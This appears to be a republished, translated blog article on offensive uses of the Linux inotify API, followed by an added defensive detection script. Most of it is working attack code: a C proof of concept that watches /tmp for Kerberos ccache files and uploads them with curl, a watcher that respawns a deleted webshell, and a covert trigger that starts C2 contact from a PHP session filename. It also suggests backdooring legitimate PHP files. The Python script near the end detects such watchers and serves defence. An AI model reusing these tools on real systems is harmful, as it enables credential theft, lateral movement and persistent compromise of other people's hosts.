
How to rethink the use of the inotify API from the attacker's point of view

2025-03-30 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

This article explains in detail how to rethink the use of the inotify API from the attacker's point of view. The content of the article is of high quality, so the editor shares it with you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

In the past, when we looked at the use of the inotify API, we focused on the defensive side: for example, IT administrators use it to monitor changes to files or directories to assist in troubleshooting and intrusion investigation. Here we focus on the attacking side, to familiarize you with the creepier uses of the inotify API.

0x00 Steal ccache files

In an enterprise network it is common for Linux and Windows systems to coexist and to delegate authentication to Active Directory. When an attacker gains privileges on a Linux host, he usually looks in the /tmp directory for the credential cache file (ccache), which usually contains the TGT (Ticket-Granting Ticket) used for user-to-service authentication via the Kerberos protocol.

The file is named "krb5cc_%UID%" and can be used directly by tools based on the impacket framework. So if we can read the file, we can use tools such as psexec.py/smbexec.py to try to execute commands on other machines on the intranet and move laterally (better still if we are lucky enough to get the file of a privileged user). When we know that the network authenticates with Kerberos but cannot get the file right now (because the file has a short lifetime), we can set up an inotify watcher on the /tmp directory and forward the file to us when it is created.

Our plan is very simple. As mentioned above, create a new watcher on the /tmp directory; if a file with the prefix "krb5cc_" is created or modified, send it to us, as follows:

    // Example based on https://www.lynxbee.com/c-program-to-monitor-and-notify-changes-in-a-directory-file-using-inotify/
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/inotify.h>
    #include <curl/curl.h>

    #define MAX_EVENTS 1024                                 /* Number of events to process at one go (value as in the lynxbee example; lost in extraction) */
    #define LEN_NAME 1024                                   /* Assuming length of the filename won't exceed 1024 bytes */
    #define EVENT_SIZE (sizeof(struct inotify_event))       /* sizeof one event */
    #define BUF_LEN (MAX_EVENTS * (EVENT_SIZE + LEN_NAME))  /* buffer to store the data of events */
    #define endpoint "http://localhost:4444"

    int exfiltrate(char *filename) {
        CURL *curl;
        CURLcode res;
        struct stat file_info;
        FILE *fd;

        fd = fopen(filename, "rb");
        if (!fd) {
            return -1;
        }
        if (fstat(fileno(fd), &file_info) != 0) {
            fclose(fd);
            return -1;
        }

        curl = curl_easy_init();
        if (curl) {
            curl_easy_setopt(curl, CURLOPT_URL, endpoint);
            curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
            curl_easy_setopt(curl, CURLOPT_READDATA, fd);
            res = curl_easy_perform(curl);
            if (res != CURLE_OK) {
                curl_easy_cleanup(curl);
                fclose(fd);
                return -1;
            }
            curl_easy_cleanup(curl);
        }
        fclose(fd);
        return 0;
    }

    int main(int argc, char **argv) {
        int length, i = 0, wd;
        int fd;
        char buffer[BUF_LEN];
        char *ticketloc = NULL;

        printf("[Kerberos ccache exfiltrator PoC]\n\n");

        // Initiate inotify
        if ((fd = inotify_init()) < 0) {
            printf("Could not initiate inotify!!\n");
            return -1;
        }

        // Add a watcher for the creation or modification of files at /tmp folder
        if ((wd = inotify_add_watch(fd, "/tmp", IN_CREATE | IN_MODIFY)) == -1) {
            printf("Could not add a watcher!!\n");
            return -2;
        }

        // Main loop
        while (1) {
            i = 0;
            length = read(fd, buffer, BUF_LEN);
            if (length < 0) {
                return -3;
            }
            while (i < length) {
                struct inotify_event *event = (struct inotify_event *)&buffer[i];
                if (event->len) {
                    // Check for prefix
                    if (strncmp(event->name, "krb5cc_", strlen("krb5cc_")) == 0) {
                        printf("New cache file found! (%s)", event->name);
                        asprintf(&ticketloc, "/tmp/%s", event->name);
                        // Forward it to us
                        if (exfiltrate(ticketloc) != 0) {
                            printf("- Failed!\n");
                        } else {
                            printf("- Exfiltrated!\n");
                        }
                        free(ticketloc);
                    }
                }
                // Advance past this event even when it carries no name
                i += EVENT_SIZE + event->len;
            }
        }
    }

After the creation of the file has been observed, we can use an LDAP search to check the permissions of the current user.

Another common scenario: when the webshell we placed is deleted (because the administrator discovered it, a CMS update, etc.), we can use inotify to create another one as soon as the webshell is deleted and notify us. The code is as follows:

    // Same includes and #defines as the first example.
    // Prototype only: the body of respawn_webshell() is not given in the article.
    void respawn_webshell(void);

    int main(int argc, char **argv) {
        int length, i = 0, wd;
        int fd;
        char buffer[BUF_LEN];

        // Initiate inotify
        if ((fd = inotify_init()) < 0) {
            printf("Could not initiate inotify!!\n");
            return -1;
        }

        // Webshell location
        if ((wd = inotify_add_watch(fd, "/var/www/html/my_shinny_webshell.php", IN_DELETE | IN_DELETE_SELF)) == -1) {
            printf("Could not add a watcher!!\n");
            return -2;
        }

        // Main loop
        while (1) {
            i = 0;
            length = read(fd, buffer, BUF_LEN);
            if (length < 0) {
                return -3;
            }
            while (i < length) {
                struct inotify_event *event = (struct inotify_event *)&buffer[i];
                if (event->len) {
                    respawn_webshell();
                }
                i += EVENT_SIZE + event->len;
            }
        }
    }

Other ideas: when a legitimate PHP file is modified, put our backdoor into it as well. Alternatively, monitor the configuration file to detect whether the database connection account has changed.

0x02 Trigger malware behaviour based on the PHP session name

We can send commands to our implants through a covert channel: the name of the file in which PHP stores the session. For example, in the following example, I imagine starting communication with our C2 when a file named sess_ALEAIACTAESTXX is created.

    // Same includes and #defines as the first example.
    // Prototype only: the body of start_communication_with_CC() is not given in the article.
    void start_communication_with_CC(void);

    int main(int argc, char **argv) {
        int length, i = 0, wd;
        int fd;
        char buffer[BUF_LEN];

        // Initiate inotify
        if ((fd = inotify_init()) < 0) {
            printf("Could not initiate inotify!!\n");
            return -1;
        }

        // Session folder as set in session.save_path
        if ((wd = inotify_add_watch(fd, "/var/lib/php/session", IN_CREATE)) == -1) {
            printf("Could not add a watcher!!\n");
            return -2;
        }

        // Main loop
        while (1) {
            i = 0;
            length = read(fd, buffer, BUF_LEN);
            if (length < 0) {
                return -3;
            }
            while (i < length) {
                struct inotify_event *event = (struct inotify_event *)&buffer[i];
                if (event->len) {
                    if (strncmp(event->name, "sess_ALEAIACTAEST", strlen("sess_ALEAIACTAEST")) == 0) {
                        start_communication_with_CC();
                    }
                }
                i += EVENT_SIZE + event->len;
            }
        }
    }

With a simple curl request (curl http://localhost/test.php --cookie "PHPSESSID=ALEAIACTAESTx1"), we can trigger this action.
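All three watchers in this article (on /tmp, on the webshell under the web root, and on the PHP session directory) leave the same trace on the host: every inotify descriptor a process holds is listed in /proc/<pid>/fdinfo/<fd> as an "inotify wd:... ino:... sdev:... mask:..." line that names the watched inode and the event mask. The following defender-side script is an added example, not code from the article or the lynxbee page: it parses that fdinfo format, decodes the mask into IN_* names, and matches the watched inode and device against the directories an analyst cares about. The sample fdinfo text and the inode table are constructed; the path list in the main guard is an assumption to adjust to the local web root and session.save_path.

```python
"""Enumerate inotify watches from /proc/<pid>/fdinfo and flag those on sensitive paths."""
import os
import re

# Event bits from <sys/inotify.h>, used to decode the mask column.
INOTIFY_BITS = {
    0x001: "IN_ACCESS", 0x002: "IN_MODIFY", 0x004: "IN_ATTRIB",
    0x008: "IN_CLOSE_WRITE", 0x010: "IN_CLOSE_NOWRITE", 0x020: "IN_OPEN",
    0x040: "IN_MOVED_FROM", 0x080: "IN_MOVED_TO", 0x100: "IN_CREATE",
    0x200: "IN_DELETE", 0x400: "IN_DELETE_SELF", 0x800: "IN_MOVE_SELF",
}

# Fields as printed by fs/notify/fdinfo.c; all values are hexadecimal.
WATCH_RE = re.compile(
    r"^inotify wd:([0-9a-f]+) ino:([0-9a-f]+) sdev:([0-9a-f]+) mask:([0-9a-f]+)",
    re.MULTILINE,
)

# Constructed sample fdinfo content (not captured from a real host): three watches
# on device major 8 / minor 3 (sdev 0x800003) for inodes 0xc, 0x2a and 0xff.
SAMPLE_FDINFO = """pos:\t0
flags:\t02000000
mnt_id:\t29
ino:\t10
inotify wd:1 ino:c sdev:800003 mask:102 ignored_mask:0 fhandle-bytes:8 fhandle-type:1 f_handle:0c00000000000000
inotify wd:2 ino:2a sdev:800003 mask:600 ignored_mask:0 fhandle-bytes:8 fhandle-type:1 f_handle:2a00000000000000
inotify wd:3 ino:ff sdev:800003 mask:8 ignored_mask:0 fhandle-bytes:8 fhandle-type:1 f_handle:ff00000000000000
"""
# Constructed table standing in for os.stat() results of the sensitive paths.
SAMPLE_SENSITIVE = {(0xc, 8, 3): "/tmp", (0x2a, 8, 3): "/var/www/html"}


def decode_mask(mask):
    """Translate a mask into the IN_* names it contains (event bits only)."""
    return [name for bit, name in sorted(INOTIFY_BITS.items()) if mask & bit]


def parse_fdinfo(text):
    """Return one dict per 'inotify wd:' line: wd, inode, device major/minor, mask."""
    watches = []
    for m in WATCH_RE.finditer(text):
        wd, ino, sdev, mask = (int(x, 16) for x in m.groups())
        # sdev is the kernel dev_t: a 12-bit major above a 20-bit minor.
        watches.append({"wd": wd, "ino": ino, "major": sdev >> 20,
                        "minor": sdev & 0xFFFFF, "mask": mask})
    return watches


def inode_key(path):
    """(inode, major, minor) of a path, in the same form parse_fdinfo() produces."""
    st = os.stat(path)
    return (st.st_ino, os.major(st.st_dev), os.minor(st.st_dev))


def flag_watches(watches, sensitive):
    """Return (path, [IN_* names]) for every watch that sits on a sensitive path."""
    hits = []
    for w in watches:
        key = (w["ino"], w["major"], w["minor"])
        if key in sensitive:
            hits.append((sensitive[key], decode_mask(w["mask"])))
    return hits


def scan_live(paths):
    """Walk /proc on a Linux host and return (pid, fd, path, events) findings."""
    findings = []
    if not os.path.isdir("/proc"):
        return findings
    sensitive = {}
    for p in paths:
        try:
            sensitive[inode_key(p)] = p
        except OSError:
            continue  # path absent on this host
    for pid in filter(str.isdigit, os.listdir("/proc")):
        fdinfo_dir = f"/proc/{pid}/fdinfo"
        try:
            fds = os.listdir(fdinfo_dir)
        except OSError:
            continue  # process exited, or not ours to inspect without root
        for fd in fds:
            try:
                with open(f"{fdinfo_dir}/{fd}") as fh:
                    text = fh.read()
            except OSError:
                continue
            for path, events in flag_watches(parse_fdinfo(text), sensitive):
                findings.append((int(pid), int(fd), path, events))
    return findings


if __name__ == "__main__":
    # Assumed paths matching the article's three watchers; adjust the session
    # directory to the host's session.save_path.
    for pid, fd, path, events in scan_live(["/tmp", "/var/www/html", "/var/lib/php/session"]):
        print(f"pid {pid} fd {fd} watches {path} for {'|'.join(events)}")
```

Run it as root so every process's fdinfo is readable; a hit on /tmp asking for IN_CREATE|IN_MODIFY, or on the web root asking for IN_DELETE_SELF, from a process that is not a known file-synchronisation or backup agent, is what to investigate. Matching on inode plus device rather than on a path string is deliberate: the watcher holds no path, only the inode, so this is the only reliable way to tie it back to a directory.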

So much for sharing how to rethink the use of the inotify API from the attacker's point of view. I hope the above content is helpful to you and teaches you something new. If you think the article is good, you can share it for more people to see.
